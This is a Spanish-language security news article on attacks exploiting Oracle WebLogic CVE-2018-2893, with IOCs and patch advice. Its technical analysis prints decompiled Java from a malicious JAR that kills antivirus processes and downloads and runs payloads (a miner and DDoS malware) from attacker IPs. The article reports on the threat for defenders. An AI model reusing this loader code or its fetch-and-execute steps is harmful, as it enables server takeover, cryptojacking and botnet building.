Vulnerabilidad en Oracle Weblogic, explotada tras publicarse un PoC. Aplica estos parches ahora

Al menos dos grupos de hackers blackhat están actualmente aprovechando vulnerabilidades encontradas en Oracle Weblogic hace poco. Los atacantes han desarrollado scripts que permiten una explotación automatizada de los servidores que contienen instalaciones de Weblogic, produciendo ataques a gran escala.

Normalmente tenemos un cierto tiempo desde que se publica un parche para aplicarlo en los sistemas, en aquellos casos en que no se ha filtrado información. No es el caso de hoy, sin embargo, ya que al haberse publicado en la red un PoC (Proof of Concept o prueba de concepto) los malos ya saben por donde tirar para atacarnos.

Fallo de seguridad en Weblogic que requiere atención inmediata

El ataque aprovecha un exploit para la vulnerabilidad CVE-2018-2893, de tipo crítico, situada en un componente de este middleware que permitiría a un atacante tomar el control completo del servidor sin conocer su contraseña.

Oracle ha publicado varios parches de seguridad para tapar este y otros «agujeros» encontrados últiamente en sus diferentes programas (los puedes consutlar en el siguiente apartado). Para este CVE concreto se publicó un parche el pasado 18 de Julio. Evidentemente no hicieron público ningún dato sensible sobre el tema, pero 3 días más tarde varias personas estaban publicando diferentes PoC en Github y otros sitios de la red. Así lo comentan en Bleeping Computer:

Como sucedió anteriormente con otras vulnerabilidades, la disponibilidad de este exploit ha llevado a múltiples intentos de ataque. […] Los primeros comenzaron el psado sábado 21 de Julio, tras la filtración de los supuestos PoC.

Dos grupos diferentes han desarrollado mecanismos automáticos para realizar la explotación de Weblogic:

• Luoxk: este grupo está siento investigado por Qihoo 360 Netlab. Han verificado el uso de código DSL(Nitol) para poder realizar ataques de tipo DDoS, además de códoigo Gh0st para utilizar RAT (Remote Access Trojan), el uso de XMRig para realizar minería de criptomoneda, etcétera.
• Otro grupo ha sido localizado por SANS intentando utilizar dicho exploit para instalar un backdoor (puerta trasera) en los equipos vulnerables.

Análisis técnico de la amenaza

El principal archivo para el exploit es el siguiente:

hxxp://103.99.115.220:8080/JexRemoteTools.jar #md5 hash 2f7df3baefb1cdcd7e7de38cc964c9dc

El paquete jar contiene lo siguiente:

public JexReverse(String paramString, int paramInt) throws Exception 
{
Properties localProperties = System.getProperties();
String str = localProperties.getProperty("os.name");
try
{
if (str.contains("Win"))
{
execw("taskkill /f /im 360Safe.exe");
execw("taskkill /f /im 360tray.exe");
downloadFile("hxxp://121.18.238.56:8080/aaa.exe", "59081.exe");

execw("cmd /c 59081.exe");
exec("59081.exe");
throw new Exception("8888: windows执行下载者命令"); #windows execute downloader commands
}
downloadFile("hxxp://121.18.238.56:8080/testshell.sh", "gen.sh");
execw("chmod 777 gen.sh");
exec("/bin/sh gen.sh");

}
catch (Exception localException)
{

if (localException.toString().indexOf("8888") > -1) {
throw localException;
}
throw new Exception("8888:" + new String(localException.toString()) + "\r\n");
}
}

Y se produce la descarga de los siguientes archivos:

hxxp://121.18.238.56:8080/aaa.exe --> descarga xmrig 
hxxp://121.18.238.56:8080/testshell.sh --> descarga SYN_145, SYN_7008, a4.sh, a5.sh 
hxxp://121.18.238.56:8080/SYN_145 -->> BillGates malware pra DDoS, C2=121.18.238.56:145 
hxxp://121.18.238.56:8080/a4.sh --> Mata los procesos con más de un 10% de CPU 
hxxp://121.18.238.56:8080/SYN_7008 -->> BillGates malware pra DDoS, C2=121.18.238.56:7008 
hxxp://121.18.238.56:8080/a5.sh --> Mata los procesos con más de un 10% de CPU, descarga/ejecuta xmrig 
hxxp://121.18.238.56/xmrig --> xmrig es descargado y lanzado por el a5.sh superior
hxxp://luoxkexp.com:8099/ver1.txt --> configuración de xmrig

IOC (Indicadores de Compromiso)

Según han publicado en el blog de Netlab, tenemos lo siguiente:

Dominios e IPs

121.18.238.56 AS4837 CHINA UNICOM China169 Backbone 
103.99.115.220 AS21859 Zenlayer Inc 
luoxkexp.com 
xmr.luoxkexp.com 
www.luoxkexp.com 
v7.luoxkexp.com 
luoxk.f3322.net #comparten la misma IP, Dominio y comienzo de DNS

Hashes MD5 de la muestra

ff03c749b49d7dacdf50ded3c4030e61 
f34ec3ff56918c13f454472587868393 
e1df71c38cea61397e713d6e580e9051 
a8538f6d35362481749d1fd338b6b17d

URLs

http://xmr.luoxkexp.com:8888/xmrig 
http://xmr.luoxkexp.com:8888/xmr64.exe 
http://xmr.luoxkexp.com:8888/version.txt 
http://xmr.luoxkexp.com:8888/jjj.exe 
http://xmr.luoxkexp.com:8888/7799 
http://xmr.luoxkexp.com:8888/2.exe 
http://xmr.luoxkexp.com:8888/1.sh 
http://xmr.luoxkexp.com:8888/1.exe 
http://xmr.luoxkexp.com/ 
http://xmr.luoxkexp.com/1.exe 
hxxp://103.99.115.220:8080/JexRemoteTools.jar 
hxxp://121.18.238.56:8080/aaa.exe 
hxxp://121.18.238.56:8080/testshell.sh 
hxxp://121.18.238.56:8080/SYN_145 
hxxp://121.18.238.56:8080/a4.sh 
hxxp://121.18.238.56:8080/SYN_7008 
hxxp://121.18.238.56:8080/a5.sh 
hxxp://121.18.238.56/xmrig 
hxxp://luoxkexp.com:8099/ver1.txt

Parches de Oracle para Julio de 2018

Los parches de seguridad de Oracle para este mes contienen importantes correciones para diferentes versiones de su software.

En su web podéis encontrar toda la información relativa a los parches publicados, que afectan a decenas de productos diferentes:

• Oracle Enterprise Manager
• Oracle Database Server
• Oracle Finantial Services
• Oracle Fusion
• Oracle Tuxedo
• Oracle VM VirtualBox
• Hyperion
• MySQL
• JDeveloper
• Java SE

Estos son algunos de los más importantes productos de Oracle que han sido actualizados. En cuanto a sistemas operativos basados en UNIX tenemos Solaris 10, 11.2 y 11.3. Como afirma la propia empresa, es necesario aplicar los parches de manera inmediata ante la gravedad de los exploits publicados.

Fecha de publicación del próximo parche de Oracle: 16 de Octubre2018